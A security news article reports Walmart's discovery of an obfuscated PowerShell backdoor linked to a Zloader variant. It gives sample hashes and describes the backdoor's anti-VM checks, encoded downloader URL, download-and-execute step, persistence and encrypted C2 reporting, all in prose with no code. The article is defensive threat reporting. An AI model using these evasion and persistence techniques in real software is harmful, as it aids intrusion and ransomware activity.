An unknown PowerShell backdoor has been discovered alongside a new variant of the Zloader/SilentNight malware, Walmart’s Cyber Intelligence Team has reported.
The PowerShell backdoor has been constructed to provide threat actors with further access via recon activity and to deploy other malware samples, including Zloader.
The backdoor also utilizes sophisticated obfuscation techniques. It was potentially utilized alongside the new Zloader variant, the researchers said.
There is no indication the malware combination was targeted at Walmart. The retail giant’s cyber intelligence team revealed it made the discovery while proactively investigating new threats.
“The threat actor involved has links to Zloader/SilentNight, which CISA has linked to Black Basta publicly, so the aim would be breach and ransom activities,” a Walmart spokesperson told Infosecurity.
Zloader began life as a banking Trojan, but has undergone significant development over recent years, adding new functionality. The malware has been linked to a number of Russian ransomware-as-a-service groups over the years, including Ryuk, DarkSide and Black Basta.
Attackers Focusing on Obfuscation
Walmart told Infosecurity that the unknown PowerShell backdoor has some overlap with a previously observed PowerShell malware called PowerDash, particularly the way they both build the system data to send to the command and control (C2) infrastructure and how they use the same obfuscation techniques to hide the more important components of the backdoor.
PowerDash was discovered in 2023, has the functionality to collect information about the compromised system, forward it to the attackers' controlled C2 servers and await for further commands.
Walmart’s Cyber Intelligence team noted that the newly discovered PowerShell backdoor has very few samples available on the VirusTotal detection service, making detection more challenging.
“Incidentally, the samples don’t appear to detonate very well in most sandboxes which also helps them slip under the radar for longer,” the spokesperson added.
Walmart also observed that the configuration of the backdoor fits into a broader trend of a switch to scripting languages for backdoors by some of the more advanced threat actors.
“The key advice would be verifying your internal pivoting detections such as the common hardcoded strings that threat actors and malware use for gathering information about the infected organization,” the spokesperson commented.
How the Unknown PowerShell Backdoor Operates
The researchers began by analyzing the following PowerShell file:
- Compilation Timestamp 2023-05-29 16:24:50 UTC MD5: 83aa432c43f01541e4f1e2f995940e69 SHA-1: 931b6fd3e7ee5631fbc583640805809d9f2acc58 SHA-256: 82f33adfecd67735874cdc9c2bfd27d4b5b904c828d861544c249798a3e65e7e
They then discovered two more files matching the same characteristics, which are .NET packed by AgilDotNet:
- Compilation Timestamp 2023-05-30 10:31:17 UTC MD5: 41563d1f34b704728988a53833577076 SHA-1: 72a572ce8247f80946e71f637c3403228543d9a3 SHA-256: 66a69d992a82681ee1d971cc2b810dd4b58c3cfd8b4506b3d62fe1e7421fb90b
- Compilation Timestamp 2023-05-30 10:31:14 UTC MD5: e447362fb2686062a3dfc921c10dd6c7 SHA-1: 544599ef72cbd97fe50e4169c8401270ff3b917b SHA-256: b513c6940ed32766e1ac544fc547b1cb53bc95eced5b5bcc140d7c6dce377afb
After analyzing the binary, the backdoor functionality was unpacked and decrypted by the team. This uncovered a hardcoded filename within the PowerShell script.
Read now: "PowerDrop" PowerShell Malware Targets US Aerospace Industry
Checks are performed on the PowerShell script. If these fail, the malware will move itself and uninstall all the previous data. If the checks pass, it will set up a number of variables in the script.
This includes writing a VB downloader to disk alongside the executable file. The downloader contains a double base64 encoded URL that is decrypted to reveal the downloader site.
Afterwards, it executes a hardcoded curl command, which will download and execute files from the encoded URL. A check is performed if it is already running before performing the command. Tasks are installed based on a hardcoded name with a random GUID.
At this point, the script sets up a run key, and performs an admin and internet connectivity check.
The Walmart team found “heavily obfuscated” sections of code inside the script and were able to extract the code blobs and perform an analysis on them.
The first blob of code was an anti-virtual machine (VM) check, used to thwart attempts at analysis.
The next block involved the building of the information the bot will send off to the C2 along with response to commands issued. Encryption is performed using AES in CBC mode.
This enables recon to be performed, additional machine information to be gathered, and all the data that will be sent to the C2 during its initial run to be encoded.
SonicWall’s 2024 Mid-Year Cyber Threat Report found that PowerShell – a legitimate Windows automation tool used by developers – is now exploited by over 90% of malware families.
PowerShell scripts are used for various malicious tasks, including to evade detection and to download additional malware.